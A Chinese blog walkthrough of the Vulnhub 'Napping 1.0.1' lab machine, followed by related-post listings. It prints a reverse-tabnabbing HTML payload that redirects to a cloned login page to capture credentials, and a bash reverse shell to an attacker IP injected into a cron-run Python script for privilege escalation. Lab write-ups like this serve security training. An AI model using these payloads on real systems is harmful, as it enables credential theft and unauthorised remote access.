napping-1.0.1靶机

最新推荐文章于 2025-08-26 11:11:34 发布
原创 最新推荐文章于 2025-08-26 11:11:34 发布 · 185 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端

进入页面后又是熟悉的黑框输账号密码,我们老样子,先看ip

nmap 172.16.2.33/24

看到如下页面

由此可知靶机的ip为172.16.2.72,并且他还开放了80和22端口,那我们就可以先访问他的80端口,发现是一个登录的页面

因为我们没有账号,而且他也提供了注册的功能,那我们就先注册一个账号登录看看

登录账号之后发现有一个输入网址的地方,那我们就先随便输入一个网址,看看是什么功能,发现他给我们多了一行,点击后就会跳转到我们刚刚输入的网站,说明这是一个跳转网页的功能模块

那我们就可以利用这一漏洞来获取他的信息了,首先我们先创建一个恶意代码,命名为1.html

<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http:/172.16.2.24:8000/11.html');
    	if(window.opener  != window) window.opener.parent.location.replace('http://172.16.2.24:8000/11.html');
    </script>
</body>
</html>

然后复制靶机登录页面的源代码,命名为11.html

 
 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body{ font: 14px sans-serif; }
        .wrapper{ width: 360px; padding: 20px; }
    </style>
</head>
<body>
    <div class="wrapper">
        <h2>Login</h2>
        <p>Please fill in your credentials to login.</p>
 
        
        <form action="/index.php" method="post">
            <div class="form-group">
                <label>Username</label>
                <input type="text" name="username" class="form-control " value="">
                <span class="invalid-feedback"></span>
            </div>    
            <div class="form-group">
                <label>Password</label>
                <input type="password" name="password" class="form-control ">
                <span class="invalid-feedback"></span>
            </div>
            <div class="form-group">
                <input type="submit" class="btn btn-primary" value="Login">
            </div>
            <p>Don't have an account? <a href="register.php">Sign up now</a>.</p>
        </form>
    </div>
</body>
</html>

然后将创建的这两个目录放到kali的目录下,开启http服务,并且开启对8888端口的监听

python -m http.server 80
nc -lvvp 8888

然后在靶机的网页中提交我们的1.html的地址,通过监听得到他的账号密码

然后我们就可以远程连接到他的主机上了

接下来我们就可以向他的定时启动文件中写入我们的木马来反弹shell,首先我们需要查看此用户组下可运行的程序

find / -group administrators 2>/dev/null

查看这个文件

发现site_status.txt文件每两分钟写入一次,就表明query.py每两分钟执行一次,因此我们就可以写入反弹shell的脚本来让query.py脚本进行执行,获取更高的权限的shell

接下来我们就可以在/home/daniel下写入shell.sh文件,进行反弹shell

#!/bin/bash
bash -c 'bash -i >& /dev/tcp/172.16.2.24/8888 0>&1'

然后在query.py文件中添加对shell.sh脚本的执行,添加以下内容

import os
os.system('/usr/bin/bash /home/daniel/shell.sh')

然后在kali中开启对8888端口的监听,等待两分钟后反弹到shell

2301_78563207
关注
渗透测试学习之靶机napping-1.0.1
xdbzdgx的博客
04-30 1346
前期准备 1.下载靶机Napping-1.0.1WebGOAT: 1 ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.129 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- 192.168.88.129 发现开放了80端口和22远程控制端口 2.寻找web信息 访问后发现需要登录,随即注册账号并登录。 此处..
napping-1.0.1靶机通关过程
hdhdvh的博客
07-29 643
1,下载用VirtualBox打开2,,kali使用vmware3,靶机和攻击机都使用桥接模式kali IP地址为172.16.2.17靶机 IP地址为172.16.2.20
Vulnhub napping-1.0.1靶机攻击实战(一)
初学者
02-08 923
到这里,就算获得了root的权限了,那么这里有人会问,为什么我们拿到了daniel用户的权限,不直接通过这个用户提权反而是要通过adrian用户建立反射shell进行提权呢?这个问题有兴趣的读者可以深入研究一下。
napping-1.0.1靶机练习
m0_75212639的博客
07-29 419
查看文件发现site_status.txt文件每两分钟写入一次,就表明query.py每两分钟执行一次,因此我们就可以写入反弹shell的脚本来让query.py脚本进行执行,获取更高的权限的shell。我们提交 http://172.16.2.63:800/1.html 到网址处。我们之前扫描看到了ssh服务开启,尝试xshell连接登录,新建会话,填写信息,登录。访问网址 http://172.16.2.63 可以看到我们写的文件。是个登录页面,我们没有账号,注册一个。
Vulnhub-NAPPING: 1.0.1靶机
qq_74265615的博客
07-29 490
在官网中下载好对应的靶机安装到VirtualBox中,这里使用的网络模式为桥接。
Vulnhub napping-1.0.1靶机渗透攻略详解
2201_75617121的博客
07-29 752
本文记录了从下载Napping靶机到最终提权的完整渗透测试过程。首先配置靶机网络并扫描获取IP(192.168.29.134),发现开放22、80端口。通过目录扫描发现web界面,注册账号后发现URL输入功能存在XSS漏洞,构造钓鱼页面获取SSH凭证。连接后利用定时执行的Python脚本(query.py)写入反弹shell命令,成功获取初始立足点。最后通过vim的sudo权限提权,获得root权限。整个渗透过程涉及网络配置、端口扫描、web漏洞利用、权限提升等多个环节,展示了完整的渗透测试方法论。
Vulnhub靶场:NAPPING: 1.0.1
weixin_69670995的博客
06-05 1526
发现a连接出现了刚刚输入的url,猜测这是一个社工,可以写一个钓鱼页面,新建一个b.html文件,将下面的代码写入。将靶机导入到Oracle VM VirtualBox中,网络设置仅主机模式,和kali使用相同的网卡。发现该py程序每两分钟执行一次,这里在用户的家目录下新建一个shell.sh文件。然后新建一个a.html文件,下面代码写入(写一个正常的页面就行)发现一个a连接,输入一个url再次查看网页源代码。发现22端口和80端口,使用浏览器访问80端口。发现是一个登陆页面,首先进行注册。
NAPPING: 1.0.1靶场(Vulnhub系列)
m0_73062138的博客
05-03 959
因此,Raskin将此手法称为标签绑架(tabnapping),他指出当使用者连上一个嵌有第三方script程序或Flash工具的网页时,就会让自己曝露于风险中,因为相关的恶意软件得以侦测使用者经常使用或正在使用的网络服务,在用户暂时离开该网页后,该网页内容及网页标签会悄悄地变身成为伪造的网络服务,并诱导用户输入个人信息。发现是个登录框,进行了简单的漏洞探测,发现没什么可以利用的点,变进行了目录扫描,但是也没有发现可以利用的点。等标签里的一个属性设置,它的作用是规定链接或者表单提交之后的页面打开方式。
NAPPING: 1.0.1 Vulnhub靶机
qq_34942239的博客
02-27 723
没有rel=“noopener noreferrer”的情况下使用target=“_blank”是有安全风险,超链接a标签的rel="noopener noreferrer"属性是一种新特性,它能让网站更安全,超链接添加rel="noopener noreferrer"来防止钓鱼网站,因为它获取的window.opener的值为null。显示创建一个html文件,当点击生成的超链接进入这个文件的时候,父窗口会重定向到http://192.168.56.102:6677/2.html。
css的white-space: pre
qq_51035159的博客
08-22 617
简单来说,这个组件的核心就是让用户能够粘贴任何文本内容(特别是配置文件、JSON等),并且保证粘贴的内容格式完全不变,然后可以原样发送给后端处理。- white-space: pre :这是最关键的CSS属性,确保所有空格、制表符、换行符都被保留。- 用户粘贴的内容会完整存储在 inputJson.value 中,包括所有格式字符。- 使用Vue3的 v-model="inputJson" 实现双向数据绑定。- wrap="off" :防止浏览器自动换行,保持原始的行结构。- 聚焦时的视觉反馈。
什么原因会导致webview内部position为fixed且top为0的元素向上滚动出视图外
前端金牌摸鱼达人
08-26 121
什么原因会导致webview内部position为fixed且top为0的元素向上滚动出视图外
单页面应用(SPA):现代Web开发的革命性范式
Java是世界上最好的语言
08-26 504
单页面应用(SPA)是一种通过JavaScript动态更新内容的Web架构,相比传统多页面应用(MPA)具有无刷新切换、前后端解耦等优势,但也面临首屏加载慢、SEO优化难等挑战。SPA核心技术包括前端路由、异步数据请求和状态管理,适合后台系统、社交应用等交互密集型场景,而不适用于内容型网站。随着SSR、PWA等技术的发展,SPA的应用场景正在不断拓展。开发者应根据项目需求合理选择架构方案。
Webview138和139版本更新了软键盘相关的那些东西
最新发布
前端金牌摸鱼达人
08-26 137
Webview138和139版本更新了软键盘相关的那些东西
前端AI工具——TRAE
2301_80841939的博客
08-22 572
Trae 是一款直接与 Cursor 形成竞争的、由中国团队开发的AI编程助手。它同样采用基于Visual Studio Code核心的编辑器,深度集成了AI功能。
后台管理系统-16-vue3之动态路由的实现
qq_20466211的博客
08-25 171
动态添加路由函数,解决多账号路由权限问题。
[vue3] 少量全局数据共享(不用 Vuex/Pinia)
qq_14993591的博客
08-25 318
/script>Vue 3 少量全局数据共享的最佳实践(无需 Vuex/Pinia)
如何在前端开发中应用AI技术?
苦逼前端分享苦逼经验
08-25 738
本文介绍了AI技术在前端开发中的应用,主要包括两大方向:一是在开发流程中使用AI工具提升效率(如智能代码生成、UI设计转换、自动化调试);二是在前端产品中集成AI功能优化用户体验(如智能搜索、个性化推荐、图像识别)。文章详细列举了相关技术栈(TensorFlow.js、ONNX.js)、实用工具(GitHub Copilot、Figma插件)和实现案例(智能搜索框组件),并强调了性能优化、数据隐私等注意事项。通过合理运用AI技术,前端开发者可以显著提升开发效率,同时为用户创造更智能的交互体验。
前端获取文件的 Hash 值
dd的博客
08-26 594
本文是一份面向 Web 和小程序开发者的深度技术指南,详解前端获取文件 Hash 值的多种方式,涵盖常见算法(如 MD5、SHA-256)、工具(如 SparkMD5、Crypto API)、大文件分片优化、Worker 多线程实现等内容,辅以详细的实战代码与工程化建议,帮助开发者从基础认知到最佳实践,构建安全、高效、稳定的前端文件处理方案。特性说明碰撞概率极低不同内容对应不同 Hash不可逆无法通过 Hash 还原原文件内容快速计算适合高频率验证和对比目标推荐方案通用中小文件。
CORS解决跨域问题的多个方案 - nginx站点配置 / thinkphp框架内置中间件 / 纯前端vue、vite的server.proxy代理
Rudon滨海渔村的博客
08-25 291
本文实测了三种常见的前后端跨域解决方案:1)Nginx/Apache服务器配置通过添加CORS响应头成功解决跨域问题;2)ThinkPHP框架中,传统中间件AllowCrossDomain有效,而新版跨域扩展不生效;3)Vue/Vite的前端代理配置(server.proxy)在实际测试中无效。文中详细记录了Nginx配置修改项和ThinkPHP中间件的正确使用方法,并指出Vite代理方案可能存在的局限性,为开发者提供了实用的跨域问题排查参考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值